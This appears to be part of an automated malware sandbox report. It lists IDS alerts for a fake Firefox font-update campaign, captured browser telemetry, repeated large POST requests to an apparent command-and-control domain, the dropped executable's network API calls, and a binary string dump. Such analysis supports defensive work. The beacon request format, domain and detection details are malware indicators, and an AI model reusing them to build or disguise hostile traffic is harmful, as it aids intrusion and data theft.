Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50036 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50049 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50060 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50068 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50042 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50075 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50096 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50098 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50094 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50095 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50097 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50100 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50099 -> 104.21.80.52:443
Source: global traffic, HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  Content-Length: 147
  Host: bamarelakij.site
Source: global traffic, HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  p: B5smxlJLNo14xsxDJtIvbZCH8YE
  Content-Length: 53
  Host: bamarelakij.site
Source: global traffic, HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  p: B5smxlJLNo14xsxDJtIvbZCH8YE
  Content-Length: 208
  Host: bamarelakij.site
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430943703&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3857sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b2?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1BB0012d778c190819b9e701736430946; XID=1BB0012d778c190819b9e701736430946
Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 7.1sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 250sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; MUIDB=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5f98fa1c-3184-4abd-971b-0ba246537bf7; 
ai_session=nz8yh1TyTd8zxc9wX2nCTq|1736430943700|1736430943700; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z
Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":15,"imageId":"BB1msyCI","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; MUIDB=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5f98fa1c-3184-4abd-971b-0ba246537bf7; ai_session=nz8yh1TyTd8zxc9wX2nCTq|1736430943700|1736430943700; 
sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736430943704&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=91bab7003b9e458fa0272f5f799db4ac&activityId=91bab7003b9e458fa0272f5f799db4ac&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F3117EF083974E1AAB9B33D6E377E4FB&MUID=0196AA9642C66D0E1944BFF943A46C22 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; SM=T
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430945908&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 10861sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430945913&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 4757sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430946567&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5391sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430946922&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9892sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; msnup=
Source: global traffic HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 p: B5smxlJLNo14xsxDJtIvbZCH8YE Content-Length: 683229 Host: bamarelakij.site
Source: global traffic HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 p: B5smxlJLNo14xsxDJtIvbZCH8YE Content-Length: 745 Host: bamarelakij.site
Source: global traffic HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 p: B5smxlJLNo14xsxDJtIvbZCH8YE Content-Length: 212 Host: bamarelakij.site
Source: global traffic HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 p: B5smxlJLNo14xsxDJtIvbZCH8YE Content-Length: 380 Host: bamarelakij.site
Source: global traffic HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 p: B5smxlJLNo14xsxDJtIvbZCH8YE Content-Length: 14825 Host: bamarelakij.site
Source: global traffic HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 p: B5smxlJLNo14xsxDJtIvbZCH8YE Content-Length: 69022 Host: bamarelakij.site
Source: global traffic HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 p: B5smxlJLNo14xsxDJtIvbZCH8YE Content-Length: 35 Host: bamarelakij.site
Source: global traffic HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 p: B5smxlJLNo14xsxDJtIvbZCH8YE Content-Length: 684636 Host: bamarelakij.site
Source: global traffic HTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 p: B5smxlJLNo14xsxDJtIvbZCH8YE Content-Length: 68959 Host: bamarelakij.site
Source: global traffic HTTP traffic detected: OPTIONS /api/report?cat=msn HTTP/1.1 Host: deff.nelreports.net Connection: keep-alive Origin: https://assets.msn.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: POST /api/report?cat=msn HTTP/1.1 Host: deff.nelreports.net Connection: keep-alive Content-Length: 485 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.190.91
Source: unknown TCP traffic detected without corresponding DNS query: 13.89.178.27
Source: unknown TCP traffic detected without corresponding DNS query: 3.171.139.32
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe Code function: 2_2_6D093DAF HttpQueryInfoW,HttpQueryInfoW,HttpQueryInfoW,GetLastError,_memmove,_memmove,InternetReadFile,2_2_6D093DAF
Source: RescueCDBurner.exe, 00000004.00000002.1587922968.000000006B2D9000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: B,kQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global 
